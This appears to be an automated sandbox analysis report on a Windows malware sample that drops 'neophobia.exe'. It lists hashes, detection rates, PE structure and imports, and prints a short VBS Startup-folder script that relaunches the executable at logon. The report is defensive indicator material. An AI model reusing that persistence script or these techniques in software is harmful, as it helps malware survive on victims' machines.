Preview:	EA06..4..Dz...VsF.N&5.W".E...J$.c....tY..nk@..N..4..>4......'7.R.#.R.RZ\.GJ.M.IT..5..d...._[..q..j.f......O..'fe%..4...+7.Q....&.f.I-T.d.g....}..$.N#...........g....N..........gV...9 ....jt....?U.....!7..a.Z.M..I.j....'.....u........J.'"..5P.8...t..L.......'.Z..p..k.Y...8...p....i..r..W..BwZ.......OY...}.\En.%.l...Y.j..5.,.....}.I.r}0..%......4w'3.......g3...E%.T+S\...h..(.J.....'\|.P....O.....4Fh.I..4....~..j...M.t9..i...5.q1.M&..,..s..Ug0`....7..C.G.3;5.s].....5_..4....sF.T...T....V.?\V#...~.x\|O.-..T....ka....]T.I.Lk.[>.........0..S.N.h!..........$....M.\|Z.v;4.n......z.c.Uo..w8......"s..q..u..:..........S...u.V..z4....\|m..k.@..&../+...~+.n..c...&3p.....m.;y..SZ.]lT..4..E.....f.L.P.-.u..\c4.Wq.....m.N....T..m".J..1.n.o...X.y.W...~..\.P...>>:q...;..O..q.ry.kk..eU.d.....c....._...\|.,jcX...J...L...Z...o.Nk.Y.........\.;I..(...V...p 1.t.m..W.......u8.j,.c.......U.........G..@a....mP......`....a...`.^.:.5.....zs....];H.....g4J&.d.\x.

C:\Users\user\AppData\Local\Temp\aut6E21.tmp

Download File

Process:	C:\Users\user\AppData\Local\scrolar\neophobia.exe
File Type:	data
Category:	dropped
Size (bytes):	200932
Entropy (8bit):	7.978807839515265
Encrypted:	false
SSDEEP:	3072:5vbT/8z5CL24Lk7j03CJ1k8VXbcTDEjCULY54n4BvCAaunlyY0:KtS297NRXoTATY5hVMAyZ
MD5:	1CA39C02B0B94B192A9E6F1975932480
SHA1:	6BEC7A5F43314457B5BBE22EA942DB101BDDD354
SHA-256:	A8F3DBB9A72A40BD88EC748338DAD5376F6031538C053F6ECE0C1E8E9F8C40D0
SHA-512:	A0F9D2B6E76C0CE55DC2E5AB2DA2EC653C5726F096F91E0B872382696E7AA78DC9A24A554D0C2FA8C7190ED1750712AF2A80E5021CB2DF934883E3382AC0D05F
Malicious:	false
Reputation:	low
Preview:	EA06..4..Dz...VsF.N&5.W".E...J$.c....tY..nk@..N..4..>4......'7.R.#.R.RZ\.GJ.M.IT..5..d...._[..q..j.f......O..'fe%..4...+7.Q....&.f.I-T.d.g....}..$.N#...........g....N..........gV...9 ....jt....?U.....!7..a.Z.M..I.j....'.....u........J.'"..5P.8...t..L.......'.Z..p..k.Y...8...p....i..r..W..BwZ.......OY...}.\En.%.l...Y.j..5.,.....}.I.r}0..%......4w'3.......g3...E%.T+S\...h..(.J.....'\|.P....O.....4Fh.I..4....~..j...M.t9..i...5.q1.M&..,..s..Ug0`....7..C.G.3;5.s].....5_..4....sF.T...T....V.?\V#...~.x\|O.-..T....ka....]T.I.Lk.[>.........0..S.N.h!..........$....M.\|Z.v;4.n......z.c.Uo..w8......"s..q..u..:..........S...u.V..z4....\|m..k.@..&../+...~+.n..c...&3p.....m.;y..SZ.]lT..4..E.....f.L.P.-.u..\c4.Wq.....m.N....T..m".J..1.n.o...X.y.W...~..\.P...>>:q...;..O..q.ry.kk..eU.d.....c....._...\|.,jcX...J...L...Z...o.Nk.Y.........\.;I..(...V...p 1.t.m..W.......u8.j,.c.......U.........G..@a....mP......`....a...`.^.:.5.....zs....];H.....g4J&.d.\x.

C:\Users\user\AppData\Local\Temp\aut7C3A.tmp

Download File

Process:	C:\Users\user\AppData\Local\scrolar\neophobia.exe
File Type:	data
Category:	dropped
Size (bytes):	200932
Entropy (8bit):	7.978807839515265
Encrypted:	false
SSDEEP:	3072:5vbT/8z5CL24Lk7j03CJ1k8VXbcTDEjCULY54n4BvCAaunlyY0:KtS297NRXoTATY5hVMAyZ
MD5:	1CA39C02B0B94B192A9E6F1975932480
SHA1:	6BEC7A5F43314457B5BBE22EA942DB101BDDD354
SHA-256:	A8F3DBB9A72A40BD88EC748338DAD5376F6031538C053F6ECE0C1E8E9F8C40D0
SHA-512:	A0F9D2B6E76C0CE55DC2E5AB2DA2EC653C5726F096F91E0B872382696E7AA78DC9A24A554D0C2FA8C7190ED1750712AF2A80E5021CB2DF934883E3382AC0D05F
Malicious:	false
Preview:	EA06..4..Dz...VsF.N&5.W".E...J$.c....tY..nk@..N..4..>4......'7.R.#.R.RZ\.GJ.M.IT..5..d...._[..q..j.f......O..'fe%..4...+7.Q....&.f.I-T.d.g....}..$.N#...........g....N..........gV...9 ....jt....?U.....!7..a.Z.M..I.j....'.....u........J.'"..5P.8...t..L.......'.Z..p..k.Y...8...p....i..r..W..BwZ.......OY...}.\En.%.l...Y.j..5.,.....}.I.r}0..%......4w'3.......g3...E%.T+S\...h..(.J.....'\|.P....O.....4Fh.I..4....~..j...M.t9..i...5.q1.M&..,..s..Ug0`....7..C.G.3;5.s].....5_..4....sF.T...T....V.?\V#...~.x\|O.-..T....ka....]T.I.Lk.[>.........0..S.N.h!..........$....M.\|Z.v;4.n......z.c.Uo..w8......"s..q..u..:..........S...u.V..z4....\|m..k.@..&../+...~+.n..c...&3p.....m.;y..SZ.]lT..4..E.....f.L.P.-.u..\c4.Wq.....m.N....T..m".J..1.n.o...X.y.W...~..\.P...>>:q...;..O..q.ry.kk..eU.d.....c....._...\|.,jcX...J...L...Z...o.Nk.Y.........\.;I..(...V...p 1.t.m..W.......u8.j,.c.......U.........G..@a....mP......`....a...`.^.:.5.....zs....];H.....g4J&.d.\x.

C:\Users\user\AppData\Local\Temp\aut97E0.tmp

Download File

Process:	C:\Users\user\AppData\Local\scrolar\neophobia.exe
File Type:	data
Category:	dropped
Size (bytes):	200932
Entropy (8bit):	7.978807839515265
Encrypted:	false
SSDEEP:	3072:5vbT/8z5CL24Lk7j03CJ1k8VXbcTDEjCULY54n4BvCAaunlyY0:KtS297NRXoTATY5hVMAyZ
MD5:	1CA39C02B0B94B192A9E6F1975932480
SHA1:	6BEC7A5F43314457B5BBE22EA942DB101BDDD354
SHA-256:	A8F3DBB9A72A40BD88EC748338DAD5376F6031538C053F6ECE0C1E8E9F8C40D0
SHA-512:	A0F9D2B6E76C0CE55DC2E5AB2DA2EC653C5726F096F91E0B872382696E7AA78DC9A24A554D0C2FA8C7190ED1750712AF2A80E5021CB2DF934883E3382AC0D05F
Malicious:	false
Preview:	EA06..4..Dz...VsF.N&5.W".E...J$.c....tY..nk@..N..4..>4......'7.R.#.R.RZ\.GJ.M.IT..5..d...._[..q..j.f......O..'fe%..4...+7.Q....&.f.I-T.d.g....}..$.N#...........g....N..........gV...9 ....jt....?U.....!7..a.Z.M..I.j....'.....u........J.'"..5P.8...t..L.......'.Z..p..k.Y...8...p....i..r..W..BwZ.......OY...}.\En.%.l...Y.j..5.,.....}.I.r}0..%......4w'3.......g3...E%.T+S\...h..(.J.....'\|.P....O.....4Fh.I..4....~..j...M.t9..i...5.q1.M&..,..s..Ug0`....7..C.G.3;5.s].....5_..4....sF.T...T....V.?\V#...~.x\|O.-..T....ka....]T.I.Lk.[>.........0..S.N.h!..........$....M.\|Z.v;4.n......z.c.Uo..w8......"s..q..u..:..........S...u.V..z4....\|m..k.@..&../+...~+.n..c...&3p.....m.;y..SZ.]lT..4..E.....f.L.P.-.u..\c4.Wq.....m.N....T..m".J..1.n.o...X.y.W...~..\.P...>>:q...;..O..q.ry.kk..eU.d.....c....._...\|.,jcX...J...L...Z...o.Nk.Y.........\.;I..(...V...p 1.t.m..W.......u8.j,.c.......U.........G..@a....mP......`....a...`.^.:.5.....zs....];H.....g4J&.d.\x.

C:\Users\user\AppData\Local\Temp\disturb

Download File

Process:	C:\Users\user\Desktop\7b4Iaf58Rp.exe
File Type:	data
Category:	dropped
Size (bytes):	209920
Entropy (8bit):	7.799150922066439
Encrypted:	false
SSDEEP:	3072:zNUfw6O4wnyRD8PrNTtrUKm1q9UrbnSUjPwjrMCrQ3UIAmUgG2i7CHV/sFbdBSqK:BUYDnyGj5ZUKoHdjPwjgkMdAi/qJrs
MD5:	0F110D0BEE6DCF22DF1EB5980E491B34
SHA1:	E7CB671EB902CC3851A1C30EA1A8E1A8F729CEEE
SHA-256:	C913B5740D45357D060DB482923D37A8D548D2A275D53B8A0DF534308140B5AF
SHA-512:	024E7C0175868D444F34035C0AC802F96E281F4CB5376AC2377475752E3ED893C0487C37D401FC79AB9496B3AD8920B57B868B0A38EB9BC5FF37C743682154D5
Malicious:	false
Preview:	z..9YU9F@81Z..KE.ZU9FD81.57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9F.81Z;(.K9.\.g.9}..c#,Jz%K)#JP7.T*+W5!.$!.C/[."+...jf)WU?.:FO.ZU9FD812%.fiH.+.7.F.+.IyfF$jH.:3..K.:.Gv$.8.I.$..%;%+.GtgQO.D.5w.!+.7.Fc3V_g4.$U9FD81Z57KE9ZU9F..57KEi.U9.E<1..7.E9ZU9FD8.Z.6@D0ZU.GD8.[57KE9u.9FD(1Z5.JE9Z.9FT81Z77K@9ZU9FD84Z57KE9ZU.ED85Z5.pG9XU9.D8!Z5'KE9ZE9FT81Z57KU9ZU9FD81Z57.P;Z.9FD8QX5.YD9ZU9FD81Z57KE9ZU9FD81Z57K..[U%FD81Z57KE9ZU9FD81Z57KE9ZU9F.53Zu7KE9ZU9FD81Z.6K.8ZU9FD81Z57KE9ZU9FD81Z57KE9t!\>081Z-.JE9JU9F.91Z17KE9ZU9FD81Z57kE9:{K"%LPZ5.&E9Z.8FDV1Z5.JE9ZU9FD81Z57K.9Z.."%LPZ57.u9ZU.DD8'Z57AG9ZU9FD81Z57KEyZU.h6KC957K.+[U9&F81N47Ke;ZU9FD81Z57KE9.U9.D81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z57KE9ZU9FD81Z

C:\Users\user\AppData\Local\scrolar\neophobia.exe

Download File

Process:	C:\Users\user\Desktop\7b4Iaf58Rp.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1125888
Entropy (8bit):	7.095988140717257
Encrypted:	false
SSDEEP:	24576:8u6J33O0c+JY5UZ+XC0kGso6FaAtBghPYz9dEIrdRyRWY:mu0c++OCvkGs9FaAtwY5LR3Y
MD5:	1522DA1337568F1F00AA81AF4A9E345D
SHA1:	7FDB6AEADC77A586F43D08A7A9ADDA5387933916
SHA-256:	FFF6C4BCD537790156642C7010AAC1FDDD2A79F3143A71F5570DC19AB9BA25BA
SHA-512:	1F41A2697FFC96AC4BD6A66F7BCFFAF675D91880B28FFCFA49666E613DAB082789328CD8DFABB2FAE58BCF61A3778745C9D5AC8B14830B6B981280DE72378C59
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 91% Antivirus: Virustotal, Detection: 68%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}.r}.r}.4,".p}.....s}../..A}../#..}../".G}.{.@.{}.{.P.W}.r}.R....)."}.....s}../..s}.r}T.s}.....s}.Richr}.................PE..L...q&Vg.........."..........L.......}............@.................................v.....@...@.......@.....................L...\|....p..`.................... ...q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...`....p......................@..@.reloc...q... ...r..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\neophobia.vbs

Download File

Process:	C:\Users\user\AppData\Local\scrolar\neophobia.exe
File Type:	data
Category:	dropped
Size (bytes):	276
Entropy (8bit):	3.384638339753146
Encrypted:	false
SSDEEP:	6:DMM8lfm3OOQdUfclwL1UEZ+lX1WlG6qrmLnriIM8lfQVn:DsO+vNlwBQ1SmA2n
MD5:	7DC726A2F518B2D2AC7C064E2FD0B2B9
SHA1:	8911D028F21B677A9F515B2A8202606C5868DC6B
SHA-256:	5C8CED4B9A6C965C9175B1E91EFEA4E335815C2DFC798F5385F413FD0FCC8686
SHA-512:	9C1CC3B4E09ABAE37D617462318BD641FFCDA78D326CED0E8E0440E251F2E593322F6BE34415B5154FA5C0EF986047E4A87A46826691CF32F8412320E783D716
Malicious:	true
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.s.c.r.o.l.a.r.\.n.e.o.p.h.o.b.i.a...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.095988140717257
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	7b4Iaf58Rp.exe
File size:	1'125'888 bytes
MD5:	1522da1337568f1f00aa81af4a9e345d
SHA1:	7fdb6aeadc77a586f43d08a7a9adda5387933916
SHA256:	fff6c4bcd537790156642c7010aac1fddd2a79f3143a71f5570dc19ab9ba25ba
SHA512:	1f41a2697ffc96ac4bd6a66f7bcffaf675d91880b28ffcfa49666e613dab082789328cd8dfabb2fae58bcf61a3778745c9d5ac8b14830b6b981280de72378c59
SSDEEP:	24576:8u6J33O0c+JY5UZ+XC0kGso6FaAtBghPYz9dEIrdRyRWY:mu0c++OCvkGs9FaAtwY5LR3Y
TLSH:	0F35BE2273DDC360CB669173BF69B7056EBF3C614630B85B2F980D7DA950162262CB63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67562671 [Sun Dec 8 23:06:25 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FE45CE0B55Ah
jmp 00007FE45CDFE324h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE45CDFE4AAh
cmp edi, eax
jc 00007FE45CDFE80Eh
bt dword ptr [004C31FCh], 01h
jnc 00007FE45CDFE4A9h
rep movsb
jmp 00007FE45CDFE7BCh
cmp ecx, 00000080h
jc 00007FE45CDFE674h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE45CDFE4B0h
bt dword ptr [004BE324h], 01h
jc 00007FE45CDFE980h
bt dword ptr [004C31FCh], 00000000h
jnc 00007FE45CDFE64Dh
test edi, 00000003h
jne 00007FE45CDFE65Eh
test esi, 00000003h
jne 00007FE45CDFE63Dh
bt edi, 02h
jnc 00007FE45CDFE4AFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE45CDFE4B3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE45CDFE505h
bt esi, 03h
jnc 00007FE45CDFE558h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x4a460	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x112000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x4a460	0x4a600	62da4cfc762aa5bc0f5418ce9de2b531	False	0.911062237394958	data	7.857378023445686	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x112000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x41727	data			1.0003394623066277
RT_GROUP_ICON	0x110ee0	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x110f58	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x110f6c	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x110f80	0x14	data	English	Great Britain	1.25
RT_VERSION	0x110f94	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x111070	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
